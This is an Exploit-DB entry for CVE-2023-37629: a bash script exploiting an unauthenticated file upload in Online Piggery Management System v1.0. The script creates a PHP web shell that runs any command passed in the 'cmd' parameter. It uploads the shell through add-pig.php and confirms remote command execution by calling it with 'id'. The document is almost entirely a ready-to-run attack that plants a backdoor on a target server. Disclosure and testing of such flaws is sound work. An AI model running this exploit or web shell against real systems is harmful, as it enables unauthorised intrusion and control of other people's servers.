Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

EDB-ID:

51598


Author:

1337kid

Type:

webapps


Platform:

PHP

Date:

2023-07-19


#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "
echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "
echo "                         @1337kid"
echo 

if [[ $1 == '' ]]; then
    echo "No URL specified!"
    exit
fi

base_url=$1

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln
    echo "Generating shell.php"
#===========
cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
#===========
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')
    if [[ $req == "200" ]]; then
        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi

}

req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
if [[ $req -eq "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi